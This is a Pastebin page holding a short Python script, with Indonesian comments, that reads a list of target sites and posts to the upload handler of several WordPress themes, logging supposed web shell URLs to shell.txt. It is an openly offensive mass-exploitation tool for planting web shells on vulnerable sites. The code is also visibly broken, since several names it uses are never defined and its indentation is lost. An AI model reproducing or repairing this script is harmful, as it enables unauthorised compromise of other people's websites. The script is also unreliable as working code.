Advertisement
Guest User

Untitled

a guest
Jan 22nd, 2020
121
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.23 KB | None | 0 0
  1. # -*- coding: utf-8 -*-
  2. #!/usr/bin/python
  3. import re, sys, requests
  4. ##############
  5. ##JametCode403
  6. ##Madang
  7. ##Menolak Tidur
  8. ##Ngopi + Udud
  9. ##Kerja =>Repeat ###
  10. ############################
  11. Abang = '\033[31m'
  12. Ijo = '\033[32m'
  13. Kuning = '\033[33m'
  14. Biru = '\033[34m'
  15. Putih ='\033[1;37m'
  16. ##
  17. outfile = open("shell.txt","a")
  18. Jamet = ["/wp-content/themes/kernel-theme/functions/", "/wp-content/themes/bulteno-theme/functions/", "/wp-content/themes/rayoflight-theme/functions/", "/wp-content/themes/Anthology/functions/", "/wp-content/themes/amplus-WP-theme/amplus/functions/", "/wp-content/themes/project10-theme/functions/", "/wp-content/themes/radial-theme/functions/", "/wp-content/themes/cubed_v1.2/functions/", "/wp-content/themes/armyknife/functions/", "wp-content/themes/bordeaux-theme/functions/"]
  19. for code in Jamet:
  20. print(code)
  21. site = raw_input("input your list :")
  22. file=open(site,'r').read().splitlines()
  23. for code in file:
  24. print ('\n' +'Putih exploited... ' + code)
  25. response = requests.post(mek(code) + path + 'upload-hadler.php')
  26. if response.status_code == 200:
  27. Shell = (mek + code + "su.php")
  28. outfile.write(mek(ShellPath)+'\n')
  29. else:
  30. print ('Abangfailed ==> ' + code)
  31. print("Ijo[+] check shell.txt")
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement